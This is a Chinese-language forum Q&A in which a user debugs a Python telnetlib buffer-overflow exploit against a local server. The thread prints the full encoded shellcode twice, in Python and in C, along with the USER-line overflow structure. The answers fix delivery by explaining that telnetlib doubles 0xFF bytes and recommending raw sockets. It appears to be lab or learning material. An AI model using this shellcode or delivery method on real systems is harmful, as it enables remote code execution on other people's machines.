
Python 版本是 2.7.3。我在 Python 程式裡用了一小段 shellcode,但是失敗了。

代碼如下……完整的代碼在這裡:

https://gist.github.com/3977494

# Raw payload as a Python 2 str literal wrapped in bytearray(); the C snippet
# further down declares the identical byte sequence as unsigned char[].
# NOTE (accepted answer on this page): telnetlib.Telnet.write() doubles every
# IAC byte (0xFF) before sending, so the '\xff' bytes in the first line reach
# the server as FF FF. A C client writing to a raw socket does not do this,
# which is why the two memory dumps differ and why a network capture of the
# Python session shows more FF bytes than the source contains.
shellcode = bytearray(
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
     "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" 
     "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" 
     "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b" 
     "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e" 
     "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56" 
     "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65" 
     "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f" 
     "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b" 
     "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68" 
     "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64" 
     "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35" 
     "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a" 
     "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f" 
     "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55" 
     "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b" 
     "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41" 
     "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b" 
     "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70" 
     "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42" 
     "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64" 
     "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71" 
     "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41" 
     "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42" 
     "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71" 
     "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54" 
     "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61" 
     "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42" 
     "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65" 
     "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a" 
     ) 

# telnetlib is never imported in this excerpt, and fill, eip_address and fill2
# are not defined here either (presumably they come from the linked gist).
tn = telnetlib.Telnet('127.0.0.1', 11000) 
# Python 2: str + bytearray yields a bytearray, so user_string is a bytearray.
# Judging by the names, this is padding + overwritten return address + payload
# in one oversized USER line -- the classic buffer-overflow shape that a
# server-side length check on the login handler (or an IDS rule) would reject.
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n' 
tn.write(user_string) 
pass_string = "PASS 123\n" 
tn.write(pass_string) 

我的朋友在 C 裡使用同一個字符串,一切正常。我用 OllyDbg 檢查時發現內存裡的指令不同,看起來 Python 改變了編碼方式。我不明白……有人能幫忙嗎?這讓我很抓狂。

/* Identical byte sequence to the Python literal above. The question reports
 * that this C version works, and the accepted answer explains why: a C client
 * writes it to a raw socket unchanged, whereas telnetlib doubles every 0xFF
 * (telnet IAC) byte, such as the three in the first line, on the wire. */
unsigned char shellcode[] = 
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
     "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" 
     "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" 
     "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b" 
     "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e" 
     "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56" 
     "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65" 
     "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f" 
     "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b" 
     "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68" 
     "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64" 
     "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35" 
     "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a" 
     "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f" 
     "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55" 
     "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b" 
     "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41" 
     "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b" 
     "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70" 
     "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42" 
     "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64" 
     "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71" 
     "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41" 
     "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42" 
     "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71" 
     "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54" 
     "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61" 
     "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42" 
     "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65" 
     "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"; 


哦,我大概明白了。00AEFD70 處出現了這麼多 FF。爲什麼?

我用 C++ 寫了相同功能的代碼,一切正常。下面是兩者的比較。

換句話說,到底發生了什麼?



我不認爲只是複製字符串就夠了;從你的帖子看不出問題出在哪裡……你有沒有試過按照 http://r00tsec.blogspot.it/2011/10/python-one-line-shellcode.html 的做法? –


我認爲 bytearray != unchar(unsigned char) – njzk2


@njzk2 爲什麼?我認爲它們做的是同一件事,而且都是小端序。 – jeswang

回答


telnetlib 的文檔指出(重點是我加的):

將一個字符串寫入套接字,並把其中所有的 IAC 字符加倍。如果連接被阻塞,這個調用可能會阻塞。如果連接已關閉,可能會引發 socket.error。

而 IAC 字符恰好是 ASCII 255,也就是 '\xff'。

比較兩個轉儲就能看出:在 Python 版本中 IAC 字符 FF 被加倍了,而使用原始套接字的 C 版本沒有;在 Python 中同樣可以用 socket 模塊直接使用原始套接字。


天哪!你太棒了!問題解決了。這花了我很多時間! – jeswang


@Eout 很高興能幫上忙 :) –


再補充一點建議:任何時候要做 shellcode 或網絡方面的測試,都應使用直接的 TCP 套接字而不是 telnet。也就是說,在 Linux 上用 'nc'(netcat),編程時用普通套接字(在 Python 中是 socket(AF_INET, SOCK_STREAM))。 – Anorov


你使用的 bytearray 會改變 shellcode,試着不用 bytearray 函數來定義 shellcode。例如:

shellcode = (
     "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" 
     "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a" 
     "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32" 
     ... 
     ... 
) 

我知道這是一個舊帖子,但它幫助我寫出了一個編碼器。謝謝克雷格! – Coeus
